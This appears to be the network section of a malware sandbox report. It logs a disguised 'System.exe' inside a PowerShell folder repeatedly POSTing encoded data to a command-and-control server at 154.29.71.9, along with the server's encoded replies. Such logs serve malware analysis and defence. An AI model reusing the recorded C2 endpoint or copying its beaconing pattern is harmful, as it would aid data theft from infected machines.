                                                                                                    Jan 4, 2025 14:54:40.115242958 CET5020080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:40.115308046 CET5020080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:40.120161057 CET8050200154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:40.474786043 CET5020080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:40.480221987 CET8050200154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:40.480236053 CET8050200154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:40.480243921 CET8050200154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:40.641339064 CET8050200154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:40.775897980 CET8050200154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:40.778850079 CET5020080192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:40.891400099 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:40.896338940 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:40.896420002 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:40.896544933 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:40.901310921 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.254780054 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.259634972 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.259646893 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.259655952 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.413600922 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.546699047 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.546742916 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.671590090 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.671740055 CET5020280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.676546097 CET8050201154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.676559925 CET8050202154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:41.676604033 CET5020180192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.676645041 CET5020280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.676728964 CET5020280192.168.2.4154.29.71.9
                                                                                                    Jan 4, 2025 14:54:41.681556940 CET8050202154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:42.205413103 CET8050202154.29.71.9192.168.2.4
                                                                                                    Jan 4, 2025 14:54:42.364079952 CET5020280192.168.2.4154.29.71.9

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • 154.29.71.9

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449731154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:17.998841047 CET394OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 344
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:18.373143911 CET344OUTData Raw: 00 06 01 06 06 01 01 0a 05 06 02 01 02 01 01 00 00 03 05 0d 02 02 03 0f 07 04 0e 02 06 01 06 09 0a 00 06 59 01 0d 05 00 0d 00 06 0a 00 00 05 06 04 51 0e 0d 0e 0f 06 0b 05 02 07 00 01 07 05 0c 01 53 0f 5a 07 56 07 51 0d 04 0f 01 0f 0d 0d 02 04 05
                                                                                                    Data Ascii: YQSZVQPRR\L~p~cbb]a\oPhU}Bc|RhZsXx|{pbhntCcwpe~V@xCv~\S
                                                                                                    Jan 4, 2025 14:52:18.554953098 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:18.763582945 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:18.804034948 CET1236INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:18 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 35 37 30 0d 0a 56 4a 7e 07 78 54 7b 4a 78 04 67 59 7c 5f 6b 00 69 59 6f 41 7c 60 71 42 6e 70 68 06 69 4c 6c 46 74 60 79 0d 79 71 58 5f 76 48 7f 5f 7e 4b 78 01 55 4b 72 52 74 72 5a 5b 6b 4c 5b 06 7c 74 66 09 79 66 6b 50 69 5d 74 5d 75 5b 7d 4f 76 61 6d 4a 7f 61 5b 5a 69 6f 7f 50 6a 77 59 00 75 66 7b 06 7c 5c 76 59 7d 5e 62 5a 78 01 6c 01 6c 67 7f 58 78 6d 7f 02 78 71 78 05 6c 63 62 04 7f 70 5a 02 7b 5e 6c 44 69 61 78 5c 77 62 64 01 7a 51 41 5b 7f 5e 6b 50 7f 62 72 50 77 6c 6f 5b 78 42 68 48 63 63 72 08 79 72 6e 5a 7d 0a 7d 5a 7b 4f 50 4b 75 63 78 5f 77 71 60 03 77 4f 66 50 7e 5d 7a 06 74 72 6e 5d 76 66 77 50 7e 6f 76 5c 77 6c 55 5d 7f 4d 6c 07 78 6f 78 5a 6c 60 66 4a 7c 6d 63 51 74 67 6c 03 69 61 7d 50 69 6e 64 55 78 43 7a 04 7e 4c 65 04 7b 5d 46 51 68 55 70 08 69 60 55 52 7e 77 54 01 6f 6d 7b 06 6c 72 74 00 6b 61 77 02 7d 59 55 0d 7c 5e 76 50 6e 5d 70 04 7e 5c 56 00 77 70 79 51 7b 5c 79 00 76 66 60 03 7e 48 60 02 7d 58 71 42 76 72 63 4a 7f 4c 69 42 7f 59 76 41 79 76 78 09 7e 63 73 49 76 4c 6d 03 74 [TRUNCATED]
                                                                                                    Data Ascii: 570VJ~xT{JxgY|_kiYoA|`qBnphiLlFt`yyqX_vH_~KxUKrRtrZ[kL[|tfyfkPi]t]u[}OvamJa[ZioPjwYuf{|\vY}^bZxllgXxmxqxlcbpZ{^lDiax\wbdzQA[^kPbrPwlo[xBhHccryrnZ}}Z{OPKucx_wq`wOfP~]ztrn]vfwP~ov\wlU]MlxoxZl`fJ|mcQtglia}PindUxCz~Le{]FQhUpi`UR~wTom{lrtkaw}YU|^vPn]p~\VwpyQ{\yvf`~H`}XqBvrcJLiBYvAyvx~csIvLmta}~aP}B^N}wkDuqY{LqJ|pyyg`N{YZMxS{Izr^I{M~}`t{g`|bQuOt~Ro|gh|aeCuRlNx|`Kwp\{qy~|b{OvuswqdAtaP|pf@w\[vuZ|BqwB||]tJ{B]x`j|}lvwlN}bz}mo{}vrW}pRO|R`A}NdO}Y~z}{xL`KOI~gopyz]p~r^t]q{a}JvX|E|vV}Hm@t\wK|Lqwr@{XR@}s{wrSNwa}~qz~||N~YcvaQJzbSH|`ixIlxIh{CkzLpzcz{]NZxw`jbd[uqQ]||^Y|YVOzPw|s_{RZwN\maqilr_z\y\}b`g{ZL~JxYfM`LjXweh@lqMwU|L|cxxRl^xY~I}~cP`^c]}L\OzSYQVq}@T[\\hl{sQ]QRcgLWdOTaVEU[cFRXdIPROUsfLWpLinp^GQyauKwfZJ~HVjvaAtqtZ|LaB|gqTyfx}`wb\qt_qY~[@XjcOStJb^Emr\Pln_Uh]yZpzSc{\pHxNN}pRZzp]ia@Z}c^RoTk]Wf}qSZQAsk[}K}\CYie@VrKbZF`Zc[OS]zp]Y\H{bSzGpQN\koEUNo_FjsUcU@R]yNi~cQzP} [TRUNCATED]
                                                                                                    Jan 4, 2025 14:52:18.804054022 CET354INData Raw: 59 66 0b 7d 71 55 43 53 5b 46 58 75 74 7a 56 6e 62 09 44 5a 7a 67 5c 52 65 04 51 69 00 01 09 5b 58 60 4a 57 63 7e 43 68 74 66 50 79 5b 73 6e 66 4e 7b 43 71 5b 5c 5a 5b 06 7a 43 55 62 57 41 52 54 0c 53 52 00 64 46 5c 7d 78 05 61 5b 7e 44 69 67 71
                                                                                                    Data Ascii: Yf}qUCS[FXutzVnbDZzg\ReQi[X`JWc~ChtfPy[snfN{Cq[\Z[zCUbWARTSRdF\}xa[~Digq_oAWkkYlzpeSqsooz_~ws]ldDQ~`YYbVjGVt]Mhbi]okxp_{}\CYie@VrKbZF`{@[[eISYeB]s]ZflQ~Qzz[sPt{qTo`KTc}[{PNPco@SqOiZMmO^Tq\VccT{RVP~ppM}IrMx@{@
                                                                                                    Jan 4, 2025 14:52:18.915432930 CET370OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 384
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.072777987 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.072988987 CET384OUTData Raw: 59 5f 58 58 5b 5e 5d 54 5b 59 5a 55 50 5d 5b 50 56 5c 54 45 52 5d 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_XX[^]T[YZUP][PV\TER]R^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_/>&^1=;( '(<^.3>V6=;!8U(>10+/?"Y ']/0
                                                                                                    Jan 4, 2025 14:52:19.210980892 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 10 32 29 3a 1c 31 3e 23 0e 2d 05 2d 1b 2b 20 36 43 2c 03 34 59 3c 39 23 5d 38 0d 09 1d 29 38 2e 06 2a 1f 30 0f 26 59 30 5b 28 36 20 51 03 12 27 13 26 00 32 58 2b 33 29 16 39 3d 2f 1b 20 31 24 04 32 3a 22 58 21 3e 39 5b 24 2f 21 1d 2a 3f 3a 08 2e 00 2c 06 3a 20 20 54 3e 2f 23 55 0b 1f 26 0f 27 32 20 1a 31 5e 23 03 3f 56 3f 07 29 2a 05 57 37 04 0a 11 31 07 22 59 27 32 29 12 33 32 3a 05 24 33 3a 05 36 3e 01 10 27 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"2):1>#--+ 6C,4Y<9#]8)8.*0&Y0[(6 Q'&2X+3)9=/ 1$2:"X!>9[$/!*?:.,: T>/#U&'2 1^#?V?)*W71"Y'2)32:$3:6>':.S.-W=YL0
                                                                                                    Jan 4, 2025 14:52:19.211708069 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.342773914 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.342953920 CET2596OUTData Raw: 5c 59 5d 5b 5b 5b 58 57 5b 59 5a 55 50 58 5b 52 56 52 54 41 52 5b 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Y][[[XW[YZUPX[RVRTAR[RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:.=>1>U)??['T$+ Z.#>P5.3!6(>+$3<."Y ']/
                                                                                                    Jan 4, 2025 14:52:19.479918957 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0
                                                                                                    Jan 4, 2025 14:52:19.487931013 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1468
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.618912935 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.619127035 CET1468OUTData Raw: 5c 5d 58 5f 5b 5e 58 52 5b 59 5a 55 50 5e 5b 5a 56 5c 54 44 52 51 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]X_[^XR[YZUP^[ZV\TDRQRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,92">><(-'$;$,95>?T"+5P(>/$#]-"Y ']/<
                                                                                                    Jan 4, 2025 14:52:19.837275982 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 22 58 26 29 39 0e 26 2d 2f 0f 3a 3c 21 1a 2b 30 0b 1b 2e 3d 28 58 28 5c 28 06 3b 23 27 5b 3d 5e 36 08 3e 31 0a 0b 26 06 2c 5d 3f 0c 20 51 03 12 27 5b 32 07 07 05 29 1d 32 03 3a 10 3c 08 36 32 28 03 26 29 2e 10 35 04 32 03 26 2f 39 1f 2a 3f 39 55 2e 10 06 01 2d 1d 24 54 3e 2f 23 55 0b 1f 25 55 30 21 33 0e 31 38 1d 02 3c 0e 34 5f 3f 04 2b 53 37 04 2c 59 25 3e 3d 02 27 31 36 0f 24 57 25 58 27 1d 21 19 22 2e 38 01 31 00 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98"X&)9&-/:<!+0.=(X(\(;#'[=^6>1&,]? Q'[2)2:<62(&).52&/9*?9U.-$T>/#U%U0!318<4_?+S7,Y%>='16$W%X'!".81.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449733154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:19.005683899 CET370OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 384
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.363811016 CET384OUTData Raw: 5c 5c 5d 5f 5b 55 5d 57 5b 59 5a 55 50 5e 5b 53 56 56 54 41 52 59 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \\]_[U]W[YZUP^[SVVTARYR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^.>)X&;>Q>-(<-4']0/0=!-/68"=.8&4X-"Y ']/<
                                                                                                    Jan 4, 2025 14:52:19.526730061 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.658113003 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 21 00 27 39 08 1c 32 3e 3f 0c 2e 3c 00 0a 2a 20 35 1c 38 3e 27 02 3f 03 24 05 3b 30 2f 12 3d 38 2e 0b 29 08 23 56 26 3c 2f 01 3c 0c 20 51 03 12 27 5b 25 07 04 5d 2b 23 26 02 2c 2e 28 41 35 22 27 1e 32 03 3e 10 22 3d 04 06 25 2f 2a 08 3d 06 21 51 2e 3e 2f 13 39 0d 3c 10 3f 05 23 55 0b 1f 25 56 30 31 33 0b 25 5e 20 10 28 20 30 13 2b 5c 2b 55 34 03 3c 11 31 3e 2e 5a 26 32 21 55 27 21 39 59 27 33 0b 16 23 2e 38 01 31 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98!'92>?.<* 58>'?$;0/=8.)#V&</< Q'[%]+#&,.(A5"'2>"=%/*=!Q.>/9<?#U%V013%^ ( 0+\+U4<1>.Z&2!U'!9Y'3#.81:.S.-W=YL0
                                                                                                    Jan 4, 2025 14:52:19.737657070 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:19.868134975 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:19.869843006 CET2600OUTData Raw: 5c 5d 58 50 5b 5c 58 52 5b 59 5a 55 50 5c 5b 53 56 51 54 40 52 5e 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]XP[\XR[YZUP\[SVQT@R^RYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,X!%;>)='+-%8$_/U2!6+6)71:/"Y ']/4
                                                                                                    Jan 4, 2025 14:52:20.006005049 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:19 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449736154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:20.221797943 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:52:20.570363998 CET2600OUTData Raw: 59 5c 58 5c 5b 55 5d 50 5b 59 5a 55 50 50 5b 5a 56 52 54 49 52 50 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\X\[U]P[YZUPP[ZVRTIRPRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9^,1(1>='+[+3]?.3!=66*4&?."Y ']/
                                                                                                    Jan 4, 2025 14:52:20.739820004 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:20.870229959 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449737154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:21.668365955 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:22.020023108 CET2600OUTData Raw: 59 5c 58 58 5b 54 5d 51 5b 59 5a 55 50 5e 5b 50 56 54 54 40 52 58 52 5e 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\XX[T]Q[YZUP^[PVTT@RXR^U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9[;>:182=$(=43 [8&V!#59T(.A29"Y ']/<
                                                                                                    Jan 4, 2025 14:52:22.194622993 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:22.324806929 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.449739154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:52:22.622785091 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:52:22.973128080 CET2600OUTData Raw: 5c 59 5d 5d 5b 59 58 5c 5b 59 5a 55 50 5d 5b 53 56 53 54 41 52 5b 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Y]][YX\[YZUP][SVSTAR[R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\986$(&*_<-';Z802"=3V#(U)$3 ./"Y ']/0
                                                                                                    Jan 4, 2025 14:52:23.148946047 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:52:23.279915094 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:52:23 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
